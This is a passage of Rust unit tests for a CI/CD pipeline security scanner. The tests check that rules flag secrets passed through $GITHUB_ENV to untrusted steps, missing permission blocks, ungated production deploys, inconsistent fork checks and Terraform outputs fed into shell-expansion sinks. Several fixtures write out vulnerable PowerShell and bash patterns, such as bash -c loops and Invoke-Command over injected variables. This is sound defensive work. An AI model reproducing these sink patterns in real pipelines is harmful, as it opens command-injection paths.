9383                g.add_edge(id, secret_id, EdgeKind::HasAccessTo);
9384            }
9385            step_ids.push(id);
9386        }
9387        (g, step_ids)
9388    }
9389
9390    #[test]
9391    fn env_gate_writer_then_untrusted_reader_fires() {
9392        let (g, _ids) = job_with_steps(
9393            "build",
9394            &[
9395                (
9396                    "setup",
9397                    TrustZone::FirstParty,
9398                    true,
9399                    false,
9400                    Some("CLOUD_KEY"),
9401                ),
9402                ("deploy", TrustZone::Untrusted, false, true, None),
9403            ],
9404        );
9405        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9406        assert_eq!(findings.len(), 1, "writer + untrusted reader must fire");
9407        assert_eq!(findings[0].severity, Severity::Critical);
9408        assert!(
9409            findings[0].message.contains("CLOUD_KEY"),
9410            "message must name the laundered secret"
9411        );
9412        assert!(
9413            findings[0].message.contains("deploy"),
9414            "message must name the consumer step"
9415        );
9416    }
9417
9418    #[test]
9419    fn env_gate_writer_then_first_party_reader_does_not_fire() {
9420        // First-party consumer is the legitimate use of $GITHUB_ENV — the
9421        // entire point of the gate. Only flagged when the consumer's trust
9422        // zone is reduced.
9423        let (g, _) = job_with_steps(
9424            "build",
9425            &[
9426                (
9427                    "setup",
9428                    TrustZone::FirstParty,
9429                    true,
9430                    false,
9431                    Some("CLOUD_KEY"),
9432                ),
9433                ("use-it", TrustZone::FirstParty, false, true, None),
9434            ],
9435        );
9436        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9437        assert!(
9438            findings.is_empty(),
9439            "first-party reader is the intended use; must not fire"
9440        );
9441    }
9442
9443    #[test]
9444    fn env_gate_write_of_non_secret_value_does_not_fire() {
9445        // Writer step doesn't hold any Secret/Identity — it's writing a
9446        // benign value (build version, config flag) into the env. Out of
9447        // scope: the env gate isn't laundering authority across a trust
9448        // boundary because there's no authority to launder.
9449        let (g, _) = job_with_steps(
9450            "build",
9451            &[
9452                ("setup", TrustZone::FirstParty, true, false, None),
9453                ("deploy", TrustZone::Untrusted, false, true, None),
9454            ],
9455        );
9456        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9457        assert!(
9458            findings.is_empty(),
9459            "env-gate write of non-authority value must not fire"
9460        );
9461    }
9462
9463    #[test]
9464    fn writer_in_different_job_does_not_fire() {
9465        // The env gate only propagates within a job — a writer in job A
9466        // cannot reach a consumer in job B even if both jobs run on the
9467        // same runner. Same-job constraint enforced via META_JOB_NAME.
9468        let mut g = AuthorityGraph::new(source("ci.yml"));
9469        let secret = g.add_node(NodeKind::Secret, "CLOUD_KEY", TrustZone::FirstParty);
9470
9471        let mut writer_meta = std::collections::HashMap::new();
9472        writer_meta.insert(META_JOB_NAME.into(), "build".into());
9473        writer_meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
9474        let writer =
9475            g.add_node_with_metadata(NodeKind::Step, "setup", TrustZone::FirstParty, writer_meta);
9476        g.add_edge(writer, secret, EdgeKind::HasAccessTo);
9477
9478        let mut consumer_meta = std::collections::HashMap::new();
9479        consumer_meta.insert(META_JOB_NAME.into(), "deploy".into()); // DIFFERENT job
9480        consumer_meta.insert(META_READS_ENV.into(), "true".into());
9481        g.add_node_with_metadata(
9482            NodeKind::Step,
9483            "remote-deploy",
9484            TrustZone::Untrusted,
9485            consumer_meta,
9486        );
9487
9488        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9489        assert!(
9490            findings.is_empty(),
9491            "cross-job writer/consumer pair must not fire — same-job constraint"
9492        );
9493    }
9494
9495    #[test]
9496    fn writer_after_consumer_in_same_job_does_not_fire() {
9497        // Declaration order matters: a writer that comes AFTER the
9498        // consumer can't have populated the env the consumer read. Without
9499        // this ordering check the rule would over-fire on any same-job
9500        // write/read pair.
9501        let (g, _) = job_with_steps(
9502            "build",
9503            &[
9504                ("deploy", TrustZone::Untrusted, false, true, None),
9505                (
9506                    "setup",
9507                    TrustZone::FirstParty,
9508                    true,
9509                    false,
9510                    Some("CLOUD_KEY"),
9511                ),
9512            ],
9513        );
9514        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9515        assert!(
9516            findings.is_empty(),
9517            "writer that runs after the consumer cannot launder into it"
9518        );
9519    }
9520
9521    #[test]
9522    fn third_party_consumer_also_fires() {
9523        // ThirdParty (SHA-pinned marketplace action) is still in scope —
9524        // the action's code is immutable but it can still receive and
9525        // exfiltrate the laundered secret.
9526        let (g, _) = job_with_steps(
9527            "build",
9528            &[
9529                (
9530                    "setup",
9531                    TrustZone::FirstParty,
9532                    true,
9533                    false,
9534                    Some("CLOUD_KEY"),
9535                ),
9536                (
9537                    "third-party-deploy",
9538                    TrustZone::ThirdParty,
9539                    false,
9540                    true,
9541                    None,
9542                ),
9543            ],
9544        );
9545        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9546        assert_eq!(findings.len(), 1);
9547    }
9548
9549    #[test]
9550    fn rule_appears_in_run_all_rules() {
9551        // run_all_rules wires every rule in the catalogue — assert the
9552        // new one is hooked up so it actually fires from the CLI scan path.
9553        let (g, _) = job_with_steps(
9554            "build",
9555            &[
9556                (
9557                    "setup",
9558                    TrustZone::FirstParty,
9559                    true,
9560                    false,
9561                    Some("CLOUD_KEY"),
9562                ),
9563                ("deploy", TrustZone::Untrusted, false, true, None),
9564            ],
9565        );
9566        let findings = run_all_rules(&g, 4);
9567        assert!(
9568            findings
9569                .iter()
9570                .any(|f| f.category == FindingCategory::SecretViaEnvGateToUntrustedConsumer),
9571            "secret_via_env_gate_to_untrusted_consumer must run via run_all_rules"
9572        );
9573    }
9574
9575    // ── no_workflow_level_permissions_block ──────────────────
9576
9577    fn graph_with_platform(platform: &str, file: &str) -> AuthorityGraph {
9578        let mut g = AuthorityGraph::new(source(file));
9579        g.metadata.insert(META_PLATFORM.into(), platform.into());
9580        g
9581    }
9582
9583    #[test]
9584    fn no_workflow_perms_fires_on_gha_when_marker_present_and_no_token_identity() {
9585        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9586        g.metadata
9587            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9588        // A real workflow always has at least one Step. The empty-graph
9589        // guard inside the rule excludes mis-classified variable-only YAML.
9590        g.add_node(NodeKind::Step, "build[0]", TrustZone::FirstParty);
9591        // No GITHUB_TOKEN identity nodes at all (parser would skip creating
9592        // them when there's no permissions block anywhere).
9593
9594        let findings = no_workflow_level_permissions_block(&g);
9595        assert_eq!(findings.len(), 1);
9596        assert_eq!(findings[0].severity, Severity::Medium);
9597        assert_eq!(
9598            findings[0].category,
9599            FindingCategory::NoWorkflowLevelPermissionsBlock
9600        );
9601    }
9602
9603    #[test]
9604    fn no_workflow_perms_does_not_fire_on_empty_graph() {
9605        // Empty graph (variable-only YAML mis-detected as GHA, parse
9606        // failure, etc.) has no real authority surface — must skip.
9607        let mut g = graph_with_platform("github-actions", "vars.yml");
9608        g.metadata
9609            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9610        assert!(no_workflow_level_permissions_block(&g).is_empty());
9611    }
9612
9613    #[test]
9614    fn no_workflow_perms_does_not_fire_when_a_job_declares_permissions() {
9615        // Workflow has no top-level permissions, but one job does — the rule
9616        // must not fire because the per-job override is what runs.
9617        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9618        g.metadata
9619            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9620        let mut meta = std::collections::HashMap::new();
9621        meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
9622        meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
9623        g.add_node_with_metadata(
9624            NodeKind::Identity,
9625            "GITHUB_TOKEN (build)",
9626            TrustZone::FirstParty,
9627            meta,
9628        );
9629
9630        let findings = no_workflow_level_permissions_block(&g);
9631        assert!(findings.is_empty());
9632    }
9633
9634    #[test]
9635    fn no_workflow_perms_does_not_fire_on_ado_or_gitlab() {
9636        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9637        g.metadata
9638            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9639        assert!(no_workflow_level_permissions_block(&g).is_empty());
9640
9641        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9642        g.metadata
9643            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9644        assert!(no_workflow_level_permissions_block(&g).is_empty());
9645    }
9646
9647    // ── prod_deploy_job_no_environment_gate ───────────────────
9648
9649    #[test]
9650    fn prod_deploy_no_env_gate_fires_on_ado_prod_sc_without_env_marker() {
9651        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9652        step_with_meta(
9653            &mut g,
9654            "AzureCLI : Deploy",
9655            &[(META_SERVICE_CONNECTION_NAME, "platform-prod-sc")],
9656        );
9657        let findings = prod_deploy_job_no_environment_gate(&g);
9658        assert_eq!(findings.len(), 1);
9659        assert_eq!(findings[0].severity, Severity::High);
9660        assert_eq!(
9661            findings[0].category,
9662            FindingCategory::ProdDeployJobNoEnvironmentGate
9663        );
9664        assert!(findings[0].message.contains("platform-prod-sc"));
9665    }
9666
9667    #[test]
9668    fn prod_deploy_no_env_gate_skips_when_env_marker_present() {
9669        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9670        step_with_meta(
9671            &mut g,
9672            "AzureCLI : Deploy",
9673            &[
9674                (META_SERVICE_CONNECTION_NAME, "platform-prod-sc"),
9675                (META_ENV_APPROVAL, "true"),
9676            ],
9677        );
9678        assert!(prod_deploy_job_no_environment_gate(&g).is_empty());
9679    }
9680
9681    #[test]
9682    fn prod_deploy_no_env_gate_skips_dev_connection() {
9683        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9684        step_with_meta(
9685            &mut g,
9686            "AzureCLI : Deploy",
9687            &[(META_SERVICE_CONNECTION_NAME, "platform-dev-sc")],
9688        );
9689        assert!(prod_deploy_job_no_environment_gate(&g).is_empty());
9690    }
9691
9692    #[test]
9693    fn prod_deploy_no_env_gate_via_edge_to_prod_identity() {
9694        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9695        let step = step_with_meta(&mut g, "AzureCLI : Deploy", &[]);
9696        let mut id_meta = std::collections::HashMap::new();
9697        id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
9698        let conn = g.add_node_with_metadata(
9699            NodeKind::Identity,
9700            "alz-infra-sc-prd-uks",
9701            TrustZone::FirstParty,
9702            id_meta,
9703        );
9704        g.add_edge(step, conn, EdgeKind::HasAccessTo);
9705        let findings = prod_deploy_job_no_environment_gate(&g);
9706        assert_eq!(findings.len(), 1);
9707        assert!(findings[0].message.contains("alz-infra-sc-prd-uks"));
9708    }
9709
9710    // ── long_lived_secret_without_oidc_recommendation ─────────
9711
9712    #[test]
9713    fn ll_secret_without_oidc_emits_for_aws_secret_with_no_oidc_in_graph() {
9714        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9715        g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
9716
9717        let findings = long_lived_secret_without_oidc_recommendation(&g);
9718        assert_eq!(findings.len(), 1);
9719        assert_eq!(findings[0].severity, Severity::Info);
9720        assert!(matches!(
9721            findings[0].recommendation,
9722            Recommendation::FederateIdentity { .. }
9723        ));
9724    }
9725
9726    #[test]
9727    fn ll_secret_without_oidc_skips_when_oidc_identity_present() {
9728        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9729        g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
9730        let mut meta = std::collections::HashMap::new();
9731        meta.insert(META_OIDC.into(), "true".into());
9732        g.add_node_with_metadata(
9733            NodeKind::Identity,
9734            "AWS/deploy-role",
9735            TrustZone::FirstParty,
9736            meta,
9737        );
9738
9739        assert!(long_lived_secret_without_oidc_recommendation(&g).is_empty());
9740    }
9741
9742    #[test]
9743    fn ll_secret_without_oidc_skips_unrecognised_secret_names() {
9744        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9745        g.add_node(NodeKind::Secret, "INTERNAL_KEY", TrustZone::FirstParty);
9746        // Not AWS/GCP/Azure-shaped — no actionable OIDC migration path.
9747        assert!(long_lived_secret_without_oidc_recommendation(&g).is_empty());
9748    }
9749
9750    // ── pull_request_workflow_inconsistent_fork_check ─────────
9751
9752    #[test]
9753    fn inconsistent_fork_check_fires_when_one_job_guarded_one_unguarded() {
9754        let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
9755        g.metadata
9756            .insert(META_TRIGGER.into(), "pull_request".into());
9757        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9758        let s_guarded = step_with_meta(
9759            &mut g,
9760            "build[0]",
9761            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
9762        );
9763        let s_unguarded = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
9764        g.add_edge(s_guarded, secret, EdgeKind::HasAccessTo);
9765        g.add_edge(s_unguarded, secret, EdgeKind::HasAccessTo);
9766
9767        let findings = pull_request_workflow_inconsistent_fork_check(&g);
9768        assert_eq!(findings.len(), 1);
9769        assert_eq!(
9770            findings[0].category,
9771            FindingCategory::PullRequestWorkflowInconsistentForkCheck
9772        );
9773        assert!(findings[0].message.contains("deploy"));
9774        assert!(findings[0].message.contains("build"));
9775    }
9776
9777    #[test]
9778    fn inconsistent_fork_check_skips_when_all_jobs_guarded() {
9779        let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
9780        g.metadata
9781            .insert(META_TRIGGER.into(), "pull_request".into());
9782        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9783        let s1 = step_with_meta(
9784            &mut g,
9785            "build[0]",
9786            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
9787        );
9788        let s2 = step_with_meta(
9789            &mut g,
9790            "deploy[0]",
9791            &[(META_JOB_NAME, "deploy"), (META_FORK_CHECK, "true")],
9792        );
9793        g.add_edge(s1, secret, EdgeKind::HasAccessTo);
9794        g.add_edge(s2, secret, EdgeKind::HasAccessTo);
9795        assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
9796    }
9797
9798    #[test]
9799    fn inconsistent_fork_check_skips_when_no_job_guarded() {
9800        // Both unguarded → not "inconsistent" (the org never tried). Other
9801        // rules cover the underlying risk.
9802        let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
9803        g.metadata
9804            .insert(META_TRIGGER.into(), "pull_request".into());
9805        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9806        let s1 = step_with_meta(&mut g, "build[0]", &[(META_JOB_NAME, "build")]);
9807        let s2 = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
9808        g.add_edge(s1, secret, EdgeKind::HasAccessTo);
9809        g.add_edge(s2, secret, EdgeKind::HasAccessTo);
9810        assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
9811    }
9812
9813    // ── terraform_output_via_setvariable_shell_expansion ─────
9814
9815    /// Helper: add a Step node tagged with the given job and an inline
9816    /// script body. Returns the node id so the caller can wire it up.
9817    fn add_script_step_in_job(g: &mut AuthorityGraph, name: &str, job: &str, body: &str) -> NodeId {
9818        let mut meta = std::collections::HashMap::new();
9819        meta.insert(META_SCRIPT_BODY.into(), body.into());
9820        meta.insert(META_JOB_NAME.into(), job.into());
9821        g.add_node_with_metadata(NodeKind::Step, name, TrustZone::FirstParty, meta)
9822    }
9823
9824    #[test]
9825    fn tf_output_setvariable_fires_on_solarwinds_corpus_pattern() {
9826        // Faithful reproduction of the
9827        // `Azure_Landing_Zone/sharedservice-solarwinds/.pipeline/deployment.yml`
9828        // pattern (lines ~98-180 of the corpus exemplar): a PowerShell@2
9829        // step reads `$env:TF_OUT_GDSVMS` and emits
9830        // `##vso[task.setvariable variable=gdsvms]`. A later
9831        // AzurePowerShell@5 step does `"$(gdsvms)" -split ","` followed by
9832        // `Invoke-Command` against each VM in the list.
9833        let mut g = AuthorityGraph::new(source("ado.yml"));
9834        add_script_step_in_job(
9835            &mut g,
9836            "capture-tf-outputs",
9837            "Deployment_Apply",
9838            "Write-Host \"TF_OUT_GDSVMS: $env:TF_OUT_GDSVMS\"\n\
9839             Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"\n\
9840             Write-Host \"##vso[task.setvariable variable=amlinvms]$env:TF_OUT_AMLINVMS\"",
9841        );
9842        add_script_step_in_job(
9843            &mut g,
9844            "join-vms-to-domain",
9845            "Deployment_Apply",
9846            "$GDSvmNames = \"$(gdsvms)\" -split \",\"\n\
9847             foreach ($vmName in $GDSvmNames) {\n\
9848               Invoke-Command -ComputerName $vmName -ScriptBlock { Add-Computer }\n\
9849             }",
9850        );
9851
9852        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9853        // Two captured variables (gdsvms, amlinvms) but only `gdsvms` is
9854        // referenced in the sink — exactly one finding.
9855        assert_eq!(findings.len(), 1, "got: {findings:#?}");
9856        assert_eq!(findings[0].severity, Severity::High);
9857        assert_eq!(
9858            findings[0].category,
9859            FindingCategory::TerraformOutputViaSetvariableShellExpansion
9860        );
9861        assert!(findings[0].message.contains("gdsvms"));
9862        assert!(findings[0].nodes_involved.len() == 2);
9863    }
9864
9865    #[test]
9866    fn tf_output_setvariable_fires_on_literal_terraform_output_cli() {
9867        // Variant: the capture step actually shells out to
9868        // `terraform output -raw vm_names` instead of going through the
9869        // `TF_OUT_*` env-var convention. Sink uses bash -c "$(NAME)".
9870        let mut g = AuthorityGraph::new(source("ado.yml"));
9871        add_script_step_in_job(
9872            &mut g,
9873            "tf-capture",
9874            "deploy",
9875            "VMS=$(terraform output -raw vm_names)\n\
9876             echo \"##vso[task.setvariable variable=vms;]$VMS\"",
9877        );
9878        add_script_step_in_job(
9879            &mut g,
9880            "tf-consume",
9881            "deploy",
9882            "bash -c \"for vm in $(vms); do ssh $vm uptime; done\"",
9883        );
9884
9885        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9886        assert_eq!(findings.len(), 1, "got: {findings:#?}");
9887        assert!(findings[0].message.contains("vms"));
9888    }
9889
9890    #[test]
9891    fn tf_output_setvariable_skips_when_only_phase_one_present() {
9892        // Capture step exists, but no later step in the same job ever
9893        // references the captured variable in shell-expansion position.
9894        let mut g = AuthorityGraph::new(source("ado.yml"));
9895        add_script_step_in_job(
9896            &mut g,
9897            "capture",
9898            "deploy",
9899            "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
9900        );
9901        add_script_step_in_job(
9902            &mut g,
9903            "innocuous-print",
9904            "deploy",
9905            "Write-Host 'Deployment complete.'",
9906        );
9907
9908        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9909        assert!(
9910            findings.is_empty(),
9911            "phase-1-only must not fire; got: {findings:#?}"
9912        );
9913    }
9914
9915    #[test]
9916    fn tf_output_setvariable_skips_when_only_phase_two_present() {
9917        // Sink step uses $(gdsvms) in shell-expansion position, but no
9918        // earlier step in the same job ever captured a terraform output
9919        // and emitted a setvariable for that name. Variable might be
9920        // defined elsewhere (variable group, vars yaml) — out of scope.
9921        let mut g = AuthorityGraph::new(source("ado.yml"));
9922        add_script_step_in_job(&mut g, "noop-first", "deploy", "echo 'starting deploy'");
9923        add_script_step_in_job(
9924            &mut g,
9925            "consume-only",
9926            "deploy",
9927            "$names = \"$(gdsvms)\" -split \",\"\n\
9928             foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
9929        );
9930
9931        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9932        assert!(
9933            findings.is_empty(),
9934            "phase-2-only must not fire; got: {findings:#?}"
9935        );
9936    }
9937
9938    #[test]
9939    fn inconsistent_fork_check_skips_non_pr_trigger() {
9940        let mut g = graph_with_platform("github-actions", ".github/workflows/push.yml");
9941        g.metadata.insert(META_TRIGGER.into(), "push".into());
9942        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9943        let s1 = step_with_meta(
9944            &mut g,
9945            "build[0]",
9946            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
9947        );
9948        let s2 = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
9949        g.add_edge(s1, secret, EdgeKind::HasAccessTo);
9950        g.add_edge(s2, secret, EdgeKind::HasAccessTo);
9951        assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
9952    }
9953
9954    // ── gitlab_deploy_job_missing_protected_branch_only ────────
9955
9956    #[test]
9957    fn gitlab_deploy_no_protected_only_fires_on_prod_env_without_marker() {
9958        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9959        step_with_meta(&mut g, "deploy-prod", &[("environment_name", "production")]);
9960        let findings = gitlab_deploy_job_missing_protected_branch_only(&g);
9961        assert_eq!(findings.len(), 1);
9962        assert_eq!(findings[0].severity, Severity::Medium);
9963        assert_eq!(
9964            findings[0].category,
9965            FindingCategory::GitlabDeployJobMissingProtectedBranchOnly
9966        );
9967    }
9968
9969    #[test]
9970    fn gitlab_deploy_no_protected_only_skips_when_marker_present() {
9971        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9972        step_with_meta(
9973            &mut g,
9974            "deploy-prod",
9975            &[
9976                ("environment_name", "production"),
9977                (META_RULES_PROTECTED_ONLY, "true"),
9978            ],
9979        );
9980        assert!(gitlab_deploy_job_missing_protected_branch_only(&g).is_empty());
9981    }
9982
9983    #[test]
9984    fn gitlab_deploy_no_protected_only_skips_dev_environment() {
9985        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9986        step_with_meta(&mut g, "deploy-staging", &[("environment_name", "staging")]);
9987        assert!(gitlab_deploy_job_missing_protected_branch_only(&g).is_empty());
9988    }
9989
9990    // ── compensating-control suppressions ─────────────────────
9991
9992    #[test]
9993    fn suppression_checkout_pr_downgraded_when_no_privileged_steps_in_job() {
9994        // Build a graph where checkout_self_pr_exposure would fire BUT the
9995        // job has no secret access and no env-gate writes.
9996        let mut g = graph_with_platform("github-actions", ".github/workflows/lint.yml");
9997        g.metadata
9998            .insert(META_TRIGGER.into(), "pull_request_target".into());
9999        let _checkout = step_with_meta(
10000            &mut g,
10001            "lint[0]",
10002            &[(META_JOB_NAME, "lint"), (META_CHECKOUT_SELF, "true")],
10003        );
10004        // A second non-privileged step in the same job.
10005        step_with_meta(&mut g, "lint[1]", &[(META_JOB_NAME, "lint")]);
10006
10007        let mut findings = checkout_self_pr_exposure(&g);
10008        assert_eq!(findings.len(), 1);
10009        assert_eq!(findings[0].severity, Severity::High); // pre-suppression
10010        apply_compensating_controls(&g, &mut findings);
10011        assert_eq!(
10012            findings[0].severity,
10013            Severity::Info,
10014            "checkout in a job with no privileged steps must downgrade to Info"
10015        );
10016        assert!(findings[0].message.contains("downgraded"));
10017    }
10018
10019    #[test]
10020    fn suppression_checkout_pr_unchanged_when_job_has_privileged_step() {
10021        let mut g = graph_with_platform("github-actions", ".github/workflows/build.yml");
10022        g.metadata
10023            .insert(META_TRIGGER.into(), "pull_request_target".into());
10024        let secret = g.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
10025        let checkout = step_with_meta(
10026            &mut g,
10027            "build[0]",
10028            &[(META_JOB_NAME, "build"), (META_CHECKOUT_SELF, "true")],
10029        );
10030        let priv_step = step_with_meta(&mut g, "build[1]", &[(META_JOB_NAME, "build")]);
10031        g.add_edge(priv_step, secret, EdgeKind::HasAccessTo);
10032        // checkout step itself has no edges
10033        let _ = checkout;
10034
10035        let mut findings = checkout_self_pr_exposure(&g);
10036        assert_eq!(findings.len(), 1);
10037        let pre = findings[0].severity;
10038        apply_compensating_controls(&g, &mut findings);
10039        assert_eq!(
10040            findings[0].severity, pre,
10041            "must NOT downgrade when same job has privileged steps"
10042        );
10043    }
10044
10045    #[test]
10046    fn suppression_trigger_context_downgraded_when_all_priv_jobs_fork_checked() {
10047        // pull_request_target trigger + every privileged step has fork-check.
10048        let mut g = graph_with_platform("github-actions", ".github/workflows/prt.yml");
10049        g.metadata
10050            .insert(META_TRIGGER.into(), "pull_request_target".into());
10051        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
10052        let s = step_with_meta(
10053            &mut g,
10054            "build[0]",
10055            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
10056        );
10057        g.add_edge(s, secret, EdgeKind::HasAccessTo);
10058
10059        let mut findings = trigger_context_mismatch(&g);
10060        assert_eq!(findings.len(), 1);
10061        assert_eq!(findings[0].severity, Severity::Critical);
10062        apply_compensating_controls(&g, &mut findings);
10063        assert_eq!(
10064            findings[0].severity,
10065            Severity::Medium,
10066            "trigger_context_mismatch must downgrade Critical → Medium when fork-check universal"
10067        );
10068        assert!(findings[0].message.contains("downgraded"));
10069    }
10070
10071    #[test]
10072    fn suppression_trigger_context_unchanged_when_some_priv_steps_unguarded() {
10073        let mut g = graph_with_platform("github-actions", ".github/workflows/prt.yml");
10074        g.metadata
10075            .insert(META_TRIGGER.into(), "pull_request_target".into());
10076        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
10077        let s_guard = step_with_meta(
10078            &mut g,
10079            "build[0]",
10080            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
10081        );
10082        let s_no_guard = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
10083        g.add_edge(s_guard, secret, EdgeKind::HasAccessTo);
10084        g.add_edge(s_no_guard, secret, EdgeKind::HasAccessTo);
10085
10086        let mut findings = trigger_context_mismatch(&g);
10087        let pre = findings[0].severity;
10088        apply_compensating_controls(&g, &mut findings);
10089        assert_eq!(findings[0].severity, pre);
10090    }
10091
10092    #[test]
10093    fn suppression_overpriv_identity_demoted_when_job_has_narrow_override() {
10094        // Workflow-level GITHUB_TOKEN is broad; one job has constrained override.
10095        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
10096        let mut wf_meta = std::collections::HashMap::new();
10097        wf_meta.insert(META_PERMISSIONS.into(), "write-all".into());
10098        wf_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
10099        let wf_token = g.add_node_with_metadata(
10100            NodeKind::Identity,
10101            "GITHUB_TOKEN",
10102            TrustZone::FirstParty,
10103            wf_meta,
10104        );
10105        let mut job_meta = std::collections::HashMap::new();
10106        job_meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
10107        job_meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
10108        g.add_node_with_metadata(
10109            NodeKind::Identity,
10110            "GITHUB_TOKEN (build)",
10111            TrustZone::FirstParty,
10112            job_meta,
10113        );
10114        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
10115        g.add_edge(step, wf_token, EdgeKind::HasAccessTo);
10116
10117        let mut findings = over_privileged_identity(&g);
10118        // Filter to only the workflow-level finding (the constrained job-level
10119        // override won't fire over_privileged_identity by itself).
10120        let wf_findings_count = findings
10121            .iter()
10122            .filter(|f| {
10123                f.nodes_involved
10124                    .first()
10125                    .and_then(|id| g.node(*id))
10126                    .map(|n| n.name == "GITHUB_TOKEN")
10127                    .unwrap_or(false)
10128            })
10129            .count();
10130        assert_eq!(wf_findings_count, 1);
10131        apply_compensating_controls(&g, &mut findings);
10132        let demoted = findings.iter().find(|f| {
10133            f.nodes_involved
10134                .first()
10135                .and_then(|id| g.node(*id))
10136                .map(|n| n.name == "GITHUB_TOKEN")
10137                .unwrap_or(false)
10138        });
10139        let demoted = demoted.expect("workflow-level token finding still present");
10140        assert_eq!(
10141            demoted.severity,
10142            Severity::Info,
10143            "workflow-level over_priv must downgrade to Info when narrower job override exists"
10144        );
10145        assert!(demoted.message.contains("suppressed"));
10146    }
10147
10148    #[test]
10149    fn tf_output_setvariable_skips_when_sink_quotes_in_env_block() {
10150        // Sink step references `$(gdsvms)` only in `echo "$(gdsvms)"` —
10151        // a context with no shell-expansion sigils (no bash -c, no eval,
10152        // no Invoke-Command, no -split, no command substitution, not
10153        // line-leading). The value is quoted by the shell on its way
10154        // into echo's argv and never reaches an interpreter.
10155        let mut g = AuthorityGraph::new(source("ado.yml"));
10156        add_script_step_in_job(
10157            &mut g,
10158            "capture",
10159            "deploy",
10160            "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
10161        );
10162        add_script_step_in_job(
10163            &mut g,
10164            "safe-echo",
10165            "deploy",
10166            "echo \"gdsvms is: $(gdsvms)\"",
10167        );
10168
10169        let findings = terraform_output_via_setvariable_shell_expansion(&g);
10170        assert!(
10171            findings.is_empty(),
10172            "properly-quoted echo must not fire; got: {findings:#?}"
10173        );
10174    }
10175
10176    #[test]
10177    fn tf_output_setvariable_skips_when_sink_in_different_job() {
10178        // Capture and sink exist, but in different jobs. Pipeline
10179        // variable scoping in ADO is per-stage/per-job by default — the
10180        // chain doesn't compose without explicit cross-job output
10181        // wiring (which is a separate primitive).
10182        let mut g = AuthorityGraph::new(source("ado.yml"));
10183        add_script_step_in_job(
10184            &mut g,
10185            "capture",
10186            "job-a",
10187            "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
10188        );
10189        add_script_step_in_job(
10190            &mut g,
10191            "consume",
10192            "job-b",
10193            "$names = \"$(gdsvms)\" -split \",\"\n\
10194             foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
10195        );
10196
10197        let findings = terraform_output_via_setvariable_shell_expansion(&g);
10198        assert!(
10199            findings.is_empty(),
10200            "cross-job chain must not fire; got: {findings:#?}"
10201        );
10202    }
10203
10204    #[test]
